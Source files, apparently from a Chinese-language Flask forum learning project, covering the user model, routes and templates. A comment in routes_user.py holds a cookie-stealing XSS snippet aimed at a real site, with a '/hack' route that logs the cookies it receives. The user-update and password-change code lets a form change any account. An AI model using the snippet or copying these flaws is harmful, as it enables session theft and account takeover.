server_normal_Flask_beautiful/models/user.py
from models import MonModel
from .todo import Todo
from .tweet import Tweet
from .comment import Comment
from config import  check_image
import hashlib
from flask import abort
import time


class User(MonModel):
    """
    __fields__ = [
    '_id',
    ('id', int, -1),
    ('type', str, ''),
    ('deleted', bool, False),
    ('created_time', int, 0),
    ('updated_time', int, 0),
    """
    __fields__ = MonModel.__fields__ + [
        ('username', str, ''),
        ('password', str, ''),
        ('note', str, '不要懒哦!'),
        ('role', int, 10),
        ('user_image', str, '/uploads/default.png'),
        ('I_like_tweets', list, []),
        ('I_like_comments', list, []),
    ]

    def like_tweet(self, id):
        self.I_like_tweets.append(id)
        self.save()

    def delike_tweet(self, id):
        self.I_like_tweets.remove(id)
        self.save()

    def liked_tweets(self):
        r = []
        for i in self.I_like_tweets:
            r.append(Tweet.find(i))
        return r

    def like_comment(self, id):
        self.I_like_comments.append(id)
        self.save()

    def delike_comment(self, id):
        self.I_like_comments.remove(id)
        self.save()

    def liked_comments(self):
        r = []
        for i in self.I_like_comments:
            r.append(Comment.find(i))
        return r

    @classmethod
    def update(cls, form):
        user_id = int(form.get('id', -1))
        whitelist = ['id', 'username', 'password', 'note', 'role', 'user_image', 'I_like_tweets', 'I_like_comments']
        if form.get('password', '') != '':
            user_password = form.get('password')
            password = User.salted_password(user_password)
        # 因为form不可改变，而password需要加盐处理，所以只好额外传递一个参数password
        else:
            password = None
        User.ori_update(whitelist, user_id, form, password=password)


    # def __init__(self, form):
    #     self.username = form.get('username', '')
    #     self.password = form.get('password', '')
    #     self.id = form.get('id', None)
    #     self.note = form.get('note', '')
    #     self.role = int(form.get('role', 10))
    @classmethod
    def salted_password(self, password, salt='less_is_more!'):
        def sha256(str):
            return hashlib.sha256(str.encode('utf-8')).hexdigest()

        hash1 = sha256(password)
        hash2 = sha256(hash1 + salt)
        return hash2

    # 不加salt的password
    def hashed_password(self, pwd):
        p = pwd.encode('utf-8')
        s = hashlib.sha3_256(p)
        return s.hexdigest()

    @classmethod
    def validate_login(cls, form):
        # us = User.all()
        # for u in us:
        #     if self.username == u.username and self.password == u.password:
        #         return True
        # return False
        # 更加简洁
        user = User.find_by(username=form.get('username'))
        if user is not None and user.password == User.salted_password(form.get('password')):
            return True

    @classmethod
    def validate_register(cls, form):
        # 简单验证用户名或者密码长度必须大于2
        username = form.get('username', '')
        password = form.get('password', '')
        if User.find_by(username=username) is None and len(username) > 2 and len(password) > 2:
            u = User.new(form, password=User.salted_password(password))
            # u.password = u.salted_password(password)  # 加盐
            return True

    # 增加一个获取该user全部todo的函数 todo
    def todos(self):
        return Todo.find_all(user_id=self.id)

    # 增加一个获取该user全部有效tweet的函数
    def tweets(self):
        return Tweet.find_all(user_id=self.id)

    # 增加一个获取该user全部有效comment的函数
    def comments(self):
        return Comment.find_all(user_id=self.id)

    # 增加一个获取该user全部有效comment所对应的tweet且不重复的函数
    def uni_tweets(self):
        set1 = set([c.tweet().id for c in self.comments()])
        # print('set1        ',set)
        return [Tweet.find(i) for i in set1]

    # 增加一个验证是否是管理员
    @classmethod
    def check_admin(cls):
        from routes import current_user
        from flask import (
            redirect,
            url_for,
        )
        user = current_user()
        if user.id != 1:
            abort(401)
            # return redirect(url_for('.user_login'))

    # 增加图片上传和验证和图床功能
    def save_and_up(self, file):
        user_image = check_image(file)
        self.user_image = user_image
        self.save()

    def password_update(self, form):
        if form.get('old_password', '') != '':
            if self.password == self.salted_password(form.get('old_password', '')):
                self.update(form)
        else:
            self.update(form)

server_normal_Flask_beautiful/routes/routes_board.py
from utils import log
from routes import (
    current_user,
    login_required,
)

from flask import (
    request,
    Blueprint,
    render_template,
    redirect,
    url_for,
    session,
    make_response,
    send_from_directory,
)
from models.board import Board
from models.user import User
from config import  gg


main = Blueprint('board', __name__)


@main.route('/add', methods=['POST'])
@login_required
def add():
    if Board.check_token():
        User.check_admin()
        form = request.form
        b = Board.new(form)
        return redirect(url_for('user.admin'))


@main.route('/delete/<int:board_id>')
@login_required
def delete(board_id):
    if Board.check_token():
        User.check_admin()
        Board.remove(board_id)
        return redirect(url_for('user.admin'))


@main.route('/edit/<int:board_id>', methods=['GET'])
@login_required
def edit(board_id):
    """
    只有用户id为1的用户有权限，输入需要修改的id和password
    :return: 返回修改过的所有用户的信息
    """
    user = current_user()
    if Board.check_token():
        User.check_admin()
        b = Board.find(board_id)
        return render_template('board/board_edit.html', token=gg.token[user.id], user=user, b=b)


@main.route('/update', methods=['POST'])
@login_required
def update():
    if Board.check_token():
        User.check_admin()
        form = request.form
        Board.update(form)
        # redirect有必要加query吗
        return redirect(url_for('user.admin'))

server_normal_Flask_beautiful/routes/routes_mail.py
from utils import log
from models.mail import Mail
from models.user import User
from flask import (
    request,
    Blueprint,
    render_template,
    redirect,
    url_for,
    session,
    make_response,
    abort,
)
from routes import (
    login_required,
    current_user,
)
from config import gg

main = Blueprint('mail', __name__)


# mail是私人的，只有自己可以看
@main.route('/index', methods=['GET'])
@login_required
def index():
    """
    显示该用户所有mail
    :return: 显示mail页面
    """
    user = current_user()
    if user is not None:
        print('from mail_index  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from mail_index  after', gg.csrf_tokens)

        send_mail = Mail.find_all(sender_id=user.id, sender_deleted=False)
        received_mail = Mail.find_all(receiver_id=user.id, receiver_deleted=False)
        return render_template('mail/mail_index.html', sends=send_mail, receives=received_mail, token=gg.token[user.id],
                               user=user)
    else:
        abort(401)


@main.route('/new/<int:to_user_id>', methods=['GET'])
@login_required
def new(to_user_id):
    user = current_user()
    if Mail.check_token():
        return render_template('mail/mail_new.html', token=gg.token[user.id], to_user_id=to_user_id, user=user)


@main.route('/add', methods=['POST'])
@login_required
def add():
    if Mail.check_token():
        form = request.form
        # form里面有title，content，sender_id，receiver_id
        m = Mail.new(form)
        # 管理员 回到管理员 界面
        if current_user().id == 1:
            return redirect(url_for('user.admin'))
        return redirect(url_for('.index'))


# 群发私信
@main.route('/admin_add', methods=['POST'])
@login_required
def admin_add():
    if Mail.check_token():
        User.check_admin()
        form = request.form
        for u in User.find_all():
            if u.id != 1:
                m = Mail.new(form, receiver_id=u.id)
        return redirect(url_for('user.admin', token=gg.token[current_user().id]))


@main.route('/delete/<int:mail_id>', methods=['GET'])
@login_required
def delete(mail_id):
    if Mail.check_token():
        Mail.receiver_sender_delete(mail_id)
        return redirect(url_for('.index'))


@main.route('/edit/<int:mail_id>', methods=['GET'])
@login_required
def edit(mail_id):
    user = current_user()
    if Mail.check_token():
        # mail_id = int(request.args.get('id', -1))
        m = Mail.find(mail_id)
        if current_user().id in [m.receiver_id, m.sender_id]:
            return render_template('mail/mail_edit.html', m=m, token=gg.token[user.id], user=user)
        else:
            abort(401)

@main.route('/update/<int:mail_id>', methods=['POST'])
@login_required
def update(mail_id):
    if Mail.check_token():
        form = request.form
        m = Mail.find(mail_id)
        if current_user().id in [m.receiver_id, m.sender_id]:
            Mail.update(form)
            # redirect有必要加query吗
            return redirect(url_for('.index'))
        else:
            abort(401)


@main.route('/detail/<int:mail_id>', methods=['GET'])
@login_required
def detail(mail_id):
    user = current_user()
    m = Mail.mark_read(mail_id)
    if user is not None:
        # 保证每次调用index函数时清空gg,保证每次调用index函数时都有新的token可用
        print('from mail_detail  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from mail_detail  after', gg.csrf_tokens)
        return render_template('mail/mail_detail.html', m=m, token=gg.token[user.id], user=user)
    return render_template('mail/mail_detail.html', m=m, user=user)

server_normal_Flask_beautiful/routes/routes_user.py
from utils import log
from config import  gg, image_file_dir
from routes import (
    current_user,
    login_required,
)

from flask import (
    request,
    Blueprint,
    render_template,
    redirect,
    url_for,
    session,
    make_response,
    send_from_directory,
    abort,
    flash,
)
from models.user import User
from models.board import Board
from models.mail import Mail


main = Blueprint('user', __name__)


@main.route('/', methods=['GET'])
def index():
    return render_template('blog/blog_index.html')


@main.route('/admin', methods=['GET'])
@login_required
def admin():
    """
    只有用户id为1的用户有权限
    :return: 返回所有用户的信息
    """
    user = current_user()
    User.check_admin()
    print('from admin  before', gg.csrf_tokens)
    gg.reset_value(user.id)
    print('from admin  after', gg.csrf_tokens)
    return render_template('user/admin.html', token=gg.token[user.id], mails=Mail.find_all(), user=user, users=User.find_all(), boards=Board.find_all())


@main.route('/admin/edit/<int:user_id>', methods=['GET'])
@login_required
def admin_edit(user_id):
    """
    只有用户id为1的用户有权限，输入需要修改的id和password
    :return: 返回修改过的所有用户的信息
    """
    user = current_user()
    if User.check_token():
        User.check_admin()
        u = User.find(user_id)
        return render_template('user/admin_edit.html', token=gg.token[user.id], user=user, u=u)


@main.route('/admin/update', methods=['POST'])
@login_required
def admin_update():
    """
    只有用户id为1的用户有权限，输入需要修改的id和password
    :return: 返回修改过的所有用户的信息
    """
    if User.check_token():
        User.check_admin()
        form = request.form
        User.update(form)
        return redirect(url_for('.admin'))


# 增加一个register的路由函数
@main.route('/admin/register', methods=['POST'])
def admin_register():
    """
    允许GET是因为在地址栏输入地址转到register页面需要
    POST是因为在register页面输入账号密码点击register按钮需要
    主要的bug是转到register页面和register页面都都是同一个路由函数
    :return: 返回register页面，并显示所有用户信息
    """
    if User.check_token():
        User.check_admin()
        form = request.form
        if User.validate_register(form):
            return redirect(url_for('.admin'))


@main.route('/admin/delete/<int:user_id>')
@login_required
def user_delete(user_id):
    if User.check_token():
        User.check_admin()
        User.remove(user_id)
        return redirect(url_for('.admin'))


# 所有用户上传头像,先存在本地得到路径之后上传至七牛云，并删除本地图片
@main.route('/add_image', methods=['POST'])
@login_required
def add_img():
    user = current_user()
    if User.check_token():
        file = request.files['avatar']
        user.save_and_up(file)
        return redirect(url_for('.user_setting', id=user.id, token=gg.token[user.id]))


# web后端上传头像，后续可以改成Nginx+图床
# 本地只有default.png一张图片
@main.route('/uploads/<filename>')
@login_required
def uploads(filename):
    return send_from_directory(image_file_dir, filename)


# 在知乎console输入
# var c = document.cookie
# var img = `<img src='http://localhost:4000/hack?cookie=${c}'>`
# document.body.innerHTML += img
@main.route('/hack')
def hack():
    # xss 攻击的后台
    cookie = request.args.get('cookie')
    print('cookie', cookie)


# 增加一个可以看到任意user的路由函数
# 不需要check token，CRUD中除了查不需要验证token，但是需要传递token
# 需要传递   u: 我想要看的用户    和    user: current_user()
@main.route('/user/<int:id>')
# @login_required
def user_detail(id):
    user = current_user()
    u = User.find(id)
    if u is None:
        abort(404)
    if user is not None:
        # 保证每次调用index函数时清空gg,保证每次调用index函数时都有新的token可用
        print('from profile  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from profile  after', gg.csrf_tokens)
        return render_template('user/profile.html', u=u, token=gg.token[user.id], user=user)
    return render_template('user/profile.html', u=u, user=user)


# update方法需要重新写，统一到model父类中
# 增加一个在setting页面update的路由函数
@main.route('/user/update', methods=['POST'])
@login_required
def user_update():
    user = current_user()
    if User.check_token():
        form = request.form
        user.password_update(form)
        return redirect(url_for('user.user_setting', id=user.id, token=gg.token[user.id]))


# 增加一个去setting页面的路由函数
@main.route('/setting')
@login_required
def user_setting():
    user = current_user()
    if user is not None:
        # 保证每次调用index函数时清空gg,保证每次调用index函数时都有新的token可用
        print('from setting  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from setting  after', gg.csrf_tokens)
        return render_template('user/setting.html', user=user, token=gg.token[user.id], bid=-1)


# GET 去 登陆 页面， POST 提交表单
@main.route('/login', methods=['GET', 'POST'])
def user_login():
    form = request.form
    log('from route_login --> cookies: ', request.cookies)
    # ImmutableMultiDict([])是什么鬼？
    if form.get('username', None):
        if User.validate_login(form):
            u = User.find_by(username=form.get('username'))
            print('from signin  before', session)
            session['user_id'] = u.id
            print('from signin  after', session)
            return redirect(url_for('tweet.index'))
        else:
            flash('账号密码输入错误，请核对后再输入')
            return redirect(url_for('.user_login'))
    else:
        return render_template('user/login.html')


# GET 去  注册 页面， POST 提交表单
@main.route('/register', methods=['GET', 'POST'])
def user_register():
    """
    允许GET是因为在地址栏输入地址转到register页面需要
    POST是因为在register页面输入账号密码点击register按钮需要
    主要的bug是转到register页面和register页面都都是同一个路由函数
    :return: 返回register页面，并显示所有用户信息
    """
    form = request.form
    if form.get('username', None):
        if User.validate_register(form):
            return redirect(url_for('user.user_login'))
        else:
            flash('用户名和密码长度必须大于2，请核对后再输入')
            return redirect(url_for('.user_register'))
    else:
        return render_template('user/register.html')


@main.route('/signout')
def user_signout():
    """
    在session中删除当前登录的user_id
    :return: 返回login页面
    """
    if User.check_token():
        print('from signout  before', session)
        session.pop('user_id')
        print('from signout  after', session)
        return redirect(url_for('tweet.index'))

server_normal_Flask_beautiful/templates/user/admin.html
{% extends "base.html" %}

{% import "macros.html" as macros %}

{% block title %}
    管理员界面
{% endblock %}

{% block sidebar_panel %}
    {{ macros.user_info_sidebar(user, title='管理员信息') }}

    <div class="panel">
        <div class="header">
            <span class='col_fade'>注册新用户</span>
        </div>
        <div class="inner">
            <form id="signin_form" action="{{ url_for('user.admin_register', token=token) }}" method="post">
                {{ macros.control_group('text', 'username', '用户名') }}
                {{ macros.control_group('text', 'password', '密码') }}

                <div class="form-actions">
                    <input type="submit" class="span-primary" value="注册">
                </div>
            </form>
        </div>
    </div>
    <div class="panel">
        <div class="header">
            <span class='col_fade'>添加新Board</span>
        </div>
        <div class="inner">
            <form id="signin_form" action="{{ url_for('board.add', token=token) }}" method="post">
                {{ macros.control_group('text', 'title', 'title') }}
                <div class="form-actions">
                    <input type="submit" class="span-primary" value="添加">
                </div>
            </form>
        </div>
    </div>
    <div class="panel">
        <div class="header">
            <span class='col_fade'>发送私信(单人)</span>
        </div>
        <div class="inner">
            <form id="signin_form" action="{{ url_for('mail.add', token=token) }}" method="post">
                <input type="hidden" name="sender_id" value="1">
                {{ macros.control_group('text', 'receiver_id', '用户id') }}
                {{ macros.control_group('text', 'title', 'title') }}
                {{ macros.control_group('text', 'content', 'content') }}

                <div class="form-actions">
                    <input type="submit" class="span-primary" value="发送">
                </div>
            </form>
        </div>
    </div>
    <div class="panel">
        <div class="header">
            <span class='col_fade'>发送私信(全体)</span>
        </div>
        <div class="inner">
            <form id="signin_form" action="{{ url_for('mail.admin_add', token=token) }}" method="post">
                <input type="hidden" name="sender_id" value="1">
                {{ macros.control_group('text', 'title', 'title') }}
                {{ macros.control_group('text', 'content', 'content') }}

                <div class="form-actions">
                    <input type="submit" class="span-primary" value="发送">
                </div>
            </form>
        </div>
    </div>

{% endblock %}

{% block content %}
    <div class="panel">
        <div class="header">
            <span class="col_fade">所有用户</span>
        </div>
        {% for u in users %}
            <div class="cell">
                {{ macros.user_avatar_left(u) }}
                {{ macros.counts(users, loop=loop, type='b', title_a="序号", title_b="总数") }}
                {{ macros.last_time(u, type='b') }}
                <div class="topic_title_wrapper changes">
                    {{ macros.topic_title('user.user_detail', u, 'user') }}

                    <span>
                        <a href="{{ url_for('user.user_delete', user_id=u.id, token=token) }}">删除</a>
                    </span>
                    <span>
                          <a href="{{ url_for('user.admin_edit', user_id=u.id, token=token) }}">编辑</a>
                    </span>
                </div>
            </div>
        {% else %}
            <div class="inner">
                <p>无用户</p>
            </div>
        {% endfor %}
    </div>
    <div class="panel">
        <div class="header">
            <span class="col_fade">所有Board</span>
        </div>
        {% for b in boards %}
            <div class="cell">
                {{ macros.counts(boards, loop=loop, type='b', title_a="序号", title_b="总数") }}
                {{ macros.last_time(b, type='b') }}
                <div class="topic_title_wrapper changes">
                    {{ macros.topic_title('tweet.index', b, 'board') }}

                    <span>
                        <a href="{{ url_for('board.delete', board_id=b.id, token=token) }}">删除</a>
                    </span>
                    <span>
                          <a href="{{ url_for('board.edit', board_id=b.id, token=token) }}">编辑</a>
                    </span>
                </div>
            </div>
        {% else %}
            <div class="inner">
                <p>无Board</p>
            </div>
        {% endfor %}
    </div>
    <div class="panel">
        <div class="header">
            <span class="col_fade">所有私信</span>
        </div>
        {% for m in mails %}
            {% set from_user = m.from_user() %}
            {% set to_user = m.to_user() %}
            <div class="cell">
                {{ macros.user_avatar_left(from_user) }}
                {{ macros.counts(mails, loop=loop, type='b', title_a="序号", title_b="总数") }}
                {{ macros.last_time(m, type='b', data_type='发送于 ') }}

                <div class="topic_title_wrapper changes">
                    <span class="topic_title">
                        {{ from_user.username }}
                    </span>

                    <span class="put_good">发送给</span>

                    <span class="topic_title">
                        {{ to_user.username }}
                    </span>

                    <span class="put_good">Title</span>

                    <a class="topic_title" title="{{ m.title }} "
                       href="{{ url_for('mail.detail', mail_id=m.id) }}">
                        {{ m.title }}
                    </a>

                    <span>
                        <a href="{{ url_for('mail.delete', mail_id=m.id, token=token) }}">删除</a>
                    </span>
                </div>
            </div>
        {% else %}
            <div class="inner">
                <p>无私信</p>
            </div>
        {% endfor %}
    </div>

{% endblock %}

server_normal_Flask_beautiful/templates/user/admin_edit.html
{% extends "base.html" %}

{% import "macros.html" as macros %}

{% block title %}
    管理员界面 修改 User
{% endblock %}

{% block sidebar_panel %}
    {{ macros.user_info_sidebar(user, title='管理员信息') }}
{% endblock %}

{% block content %}
    <div class='panel'>
        <div class='header'>
            <span class='col_fade'>更改信息</span>
        </div>
        <div class='inner'>
            <form id='change_pass_form' class='form-horizontal'
                  action='{{ url_for('user.admin_update', token=token) }}' method='post'>
                <input name="id" value="{{ u.id }}" type="hidden">
                {{ macros.control_group('text', 'username', '用户名', value=u.username) }}
                {{ macros.control_group('text', 'password', '密码', value=u.password) }}
                {{ macros.control_group('text', 'note', 'note', value=u.note) }}
                <div class='form-actions'>
                    <input type='submit' class='span-primary submit_btn' data-loading-text="更改中.." value='更改信息'/>
                </div>
            </form>
        </div>
    </div>


    {#    <div class='panel'>#}
    {#        <div class='header'>#}
    {#            <span class='col_fade'>更改头像</span>#}
    {#        </div>#}
    {#        <div class='inner'>#}
    {#            <form id='change_pass_form' class='form-horizontal' action='{{ url_for('user.add_img', token=token) }}'#}
    {#                  enctype=multipart/form-data method='post'>#}
    {#                <div class='control-group'>#}
    {#                    <label class='control-label' for='old_pass'>上传头像</label>#}
    {##}
    {#                    <div class='controls'>#}
    {#                        <input type=file class='input-xlarge' name='avatar'/>#}
    {#                    </div>#}
    {#                </div>#}
    {##}
    {#                <div class='form-actions'>#}
    {#                    <input type='submit' class='span-primary submit_btn' data-loading-text="上传中.." value='上传'/>#}
    {#                </div>#}
    {#            </form>#}
    {#        </div>#}
    {#    </div>#}
{% endblock %}

server_normal_Flask_beautiful/templates/user/login.html
{% extends "base.html" %}

{% import "macros.html" as macros %}

{% block title %}
    Login
{% endblock %}

{% block sidebar_panel %}
    {{ macros.About_info_sidebar() }}
{% endblock %}

{% block content %}
    {{ macros.user_action_login_or_register('user.user_login', which='登录', username='aaa', password='111') }}
{% endblock %}

server_normal_Flask_beautiful/templates/user/new_admin_edit.html
{% extends "base.html" %}

{% import "macros.html" as macros %}

{% block title %}
    管理员界面 修改 User
{% endblock %}

{% block sidebar_panel %}
    {{ macros.user_info_sidebar(user, title='管理员信息') }}
{% endblock %}

{% block content %}
    <div class='panel'>
        <div class='header'>
            <span class='col_fade'>更改信息</span>
        </div>
        <div class='inner'>
            <form id='change_pass_form' class='form-horizontal'
                  action='{{ url_for('user.admin_update', token=token) }}' method='post'>
                <input name="id" value="{{ u.id }}" type="hidden">
                {{ macros.control_group('text', 'username', '用户名', value=u.username) }}
                {{ macros.control_group('text', 'password', '密码', value=u.password) }}
                {{ macros.control_group('text', 'note', 'note', value=u.note) }}
                <div class='form-actions'>
                    <input type='submit' class='span-primary submit_btn' data-loading-text="更改中.." value='更改信息'/>
                </div>
            </form>
        </div>
    </div>


    {#    <div class='panel'>#}
    {#        <div class='header'>#}
    {#            <span class='col_fade'>更改头像</span>#}
    {#        </div>#}
    {#        <div class='inner'>#}
    {#            <form id='change_pass_form' class='form-horizontal' action='{{ url_for('user.add_img', token=token) }}'#}
    {#                  enctype=multipart/form-data method='post'>#}
    {#                <div class='control-group'>#}
    {#                    <label class='control-label' for='old_pass'>上传头像</label>#}
    {##}
    {#                    <div class='controls'>#}
    {#                        <input type=file class='input-xlarge' name='avatar'/>#}
    {#                    </div>#}
    {#                </div>#}
    {##}
    {#                <div class='form-actions'>#}
    {#                    <input type='submit' class='span-primary submit_btn' data-loading-text="上传中.." value='上传'/>#}
    {#                </div>#}
    {#            </form>#}
    {#        </div>#}
    {#    </div>#}
{% endblock %}

server_normal_Flask_beautiful/templates/user/register.html
{% extends "base.html" %}

{% import "macros.html" as macros %}

{% block title %}
    Register
{% endblock %}

{% block sidebar_panel %}
    {{ macros.About_info_sidebar() }}
{% endblock %}

{% block content %}
    {{ macros.user_action_login_or_register('user.user_register', which='注册') }}
{% endblock %}

server_normal_Flask_beautiful/templates/user/setting.html
{% extends "base.html" %}

{% import "macros.html" as macros %}

{% block title %}
    My setting
{% endblock %}

{% block sidebar_panel %}
    {{ macros.user_info_sidebar(user) }}

{% endblock %}

{% block content %}
    <div class='panel'>
        <div class='header'>
            <ul class='breadcrumb'>
                <li><a href="{{ url_for('tweet.index') }}">主页</a><span class='divider'>/</span></li>
                <li class='active'>设置</li>
            </ul>
        </div>
        <div class='inner'>
            <form id='setting_form' class='form-horizontal' action="{{ url_for('user.user_update', token=token) }}"
                  method='post'>
                <input name="id" value="{{ user.id }}" type="hidden">
                <div class='control-group'>
                    <label class='control-label' for='name'>用户名</label>

                    <div class='controls'>
                        <input class='input-xlarge' id='name' name='username' size='30' type='text'
                               value="{{ user.username }}"/>
                    </div>
                </div>

                <div class='control-group'>
                    <label class='control-label' for='signature'>个性签名</label>

                    <div class='controls'>
                        <input class='input-xlarge' id='signature' name='note' size='30' type='text'
                               value="{{ user.note }}"/>
                    </div>
                </div>
                <div class='form-actions'>
                    <input type='submit' class='span-primary submit_btn' data-loading-text="保存中.." value='保存设置'/>
                </div>
            </form>
        </div>
    </div>
    <div class='panel'>
        <div class='header'>
            <span class='col_fade'>更改密码</span>
        </div>
        <div class='inner'>
            <form id='change_pass_form' class='form-horizontal'
                  action='{{ url_for('user.user_update', token=token) }}' method='post'>
                <input name="id" value="{{ user.id }}" type="hidden">
                <div class='control-group'>
                    <label class='control-label' for='old_pass'>当前密码</label>

                    <div class='controls'>
                        <input class='input-xlarge' type='password' id='old_pass' name='old_password' size='30'/>
                    </div>
                </div>
                <div class='control-group'>
                    <label class='control-label' for='new_pass'>新密码</label>

                    <div class='controls'>
                        <input class='input-xlarge' type='password' id='new_pass' name='password' size='30'/>
                    </div>
                </div>

                <div class='form-actions'>
                    <input type='submit' class='span-primary submit_btn' data-loading-text="更改中.." value='更改密码'/>
                </div>
            </form>
        </div>
    </div>
    <div class='panel'>
        <div class='header'>
            <span class='col_fade'>更改头像</span>
        </div>
        <div class='inner'>
            <form id='change_pass_form' class='form-horizontal' action='{{ url_for('user.add_img', token=token) }}'
                  enctype=multipart/form-data method='post'>
                <div class='control-group'>
                    <label class='control-label' for='old_pass'>上传头像</label>

                    <div class='controls'>
                        <input type=file class='input-xlarge' name='avatar'/>
                    </div>
                </div>

                <div class='form-actions'>
                    <input type='submit' class='span-primary submit_btn' data-loading-text="上传中.." value='上传'/>
                </div>
            </form>
        </div>
    </div>
{% endblock %}